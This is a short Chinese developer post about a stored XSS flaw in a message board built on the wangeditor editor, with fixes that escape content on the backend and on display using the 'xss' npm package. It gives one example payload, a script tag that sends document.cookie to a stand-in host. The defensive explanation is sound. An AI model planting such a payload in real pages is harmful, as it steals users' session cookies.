bug-xss 攻击漏洞问题

XSS 攻击漏洞是什么

XSS(Cross-Site Scripting)攻击:通过在网站上植入恶意脚本来攻击用户

举例说明

在留言板发布评论,评论内容包含恶意脚本:

javascript 复制代码
<script>document.location = "http://xxx.com/getCookie?cookie=" + document.cookie;</script>

当用户看到评论时,就会触发响应,将用户cookie发送到攻击者手中

问题描述

前端使用wangeditor富文本编辑器,正常情况下编辑器都会把内容进行转码处理,转码之后就回避xss问题,这次的问题是通过一些手段提及内容(比如postman),这样提交的代码就没有经过编辑器进行转码,读取数据时就会触发恶意代码。

解决方法

  1. 方法一:后端拿到数据后,再进行一次转码,保障进入数据库的内容是转码后的;
  2. 方法二:读取后端数据后,对要展示的数据再进行一次转码,相当于保存和读取都进行转码。

转码工具

https://jsxss.com/zh/index.html

javascript 复制代码
// 安装
npm i xss
// 引用
import filterXSS from 'xss'
const newStr=filterXSS(htmlStr); // 进行转码
相关推荐
用户69371750013849 小时前
AI Agent 里的 Loop 到底是什么?
android·前端·后端
hunterandroid9 小时前
内存泄漏与 LeakCanary:从问题定位到修复思路
前端
用户94688315057509 小时前
四、elpis 基于 vue3 完成动态组件库建设
前端
用户298698530149 小时前
如何在 JavaScript 和 React 中下载/导出 Excel 文件
前端·javascript·react.js
anyup9 小时前
uView Pro 正式支持 MCP 协议!让 AI 秒懂你的组件库
前端·uni-app·ai编程
Coffeeee9 小时前
从 Android 15 到 Android 17,谷歌猝不及防的音频改动
android·前端·google
雪隐10 小时前
用Flutter做背单词APP-00前言
前端·人工智能·后端
何时梦醒10 小时前
前端存储全攻略 & JavaScript this 绑定完全指南
前端·javascript·面试
前端百草阁10 小时前
JavaScript 设计模式(23 种)
开发语言·前端·javascript·设计模式
用户693717500138410 小时前
AI 领域的 Harness,到底是什么意思?
android·前端·后端